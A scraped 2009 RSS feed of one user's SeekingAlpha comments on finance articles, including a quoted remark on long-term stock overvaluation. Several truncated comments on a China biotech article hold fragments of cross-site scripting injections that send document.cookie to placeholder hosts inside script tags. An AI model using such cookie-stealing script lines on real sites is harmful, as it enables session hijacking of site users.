Jorb's Comments Jorb's Comments RSS Syndication from SeekingAlpha.com http://seekingalpha.comuser/394393/comments China Biotech: VC Investment Takes Hit from Global Financial Crisis http://seekingalpha.com/article/128559-china-biotech-vc-investment-takes-hit-from-global-financial-crisis?source=feed#comment-505361 505361 www.yoururl.com/cookie...;</script>]]> Fri, 15 May 2009 11:52:37 -0400 www.yoururl.com/cookie...;</script>]]> China Biotech: VC Investment Takes Hit from Global Financial Crisis http://seekingalpha.com/article/128559-china-biotech-vc-investment-takes-hit-from-global-financial-crisis?source=feed#comment-505360 505360 www.host.com/mysite/st...;]]> Fri, 15 May 2009 11:51:10 -0400 www.host.com/mysite/st...;]]> China Biotech: VC Investment Takes Hit from Global Financial Crisis http://seekingalpha.com/article/128559-china-biotech-vc-investment-takes-hit-from-global-financial-crisis?source=feed#comment-505359 505359 www.host.com/mysite/st...=" + document.cookie;</s...]]> Fri, 15 May 2009 11:50:24 -0400 www.host.com/mysite/st...=" + document.cookie;</s...]]> Pension Debts: The Next Financial Crisis http://seekingalpha.com/article/79633-pension-debts-the-next-financial-crisis?source=feed#comment-505354 505354 Fri, 15 May 2009 11:48:12 -0400 Global Stock Market Valuations: Patience Is a Virtue http://seekingalpha.com/article/135067-global-stock-market-valuations-patience-is-a-virtue?source=feed#comment-489172 489172

On May 04 02:47 PM Raymond Micaletti wrote:

> The problem here is that stocks have been persistently overvalued
> (relative to longer-term historical valuations) since 1994-1995.
> So while stocks may be attractive relative to their recent past,
> over a much longer time horizon, they don't look as attractive. On
> a sector-by-sector basis in the U.S., there are some legitimately
> cheap sectors, but those sectors are getting little or no love in
> this current rally.]]>
Mon, 04 May 2009 15:24:29 -0400

On May 04 02:47 PM Raymond Micaletti wrote:

> The problem here is that stocks have been persistently overvalued
> (relative to longer-term historical valuations) since 1994-1995.
> So while stocks may be attractive relative to their recent past,
> over a much longer time horizon, they don't look as attractive. On
> a sector-by-sector basis in the U.S., there are some legitimately
> cheap sectors, but those sectors are getting little or no love in
> this current rally.]]>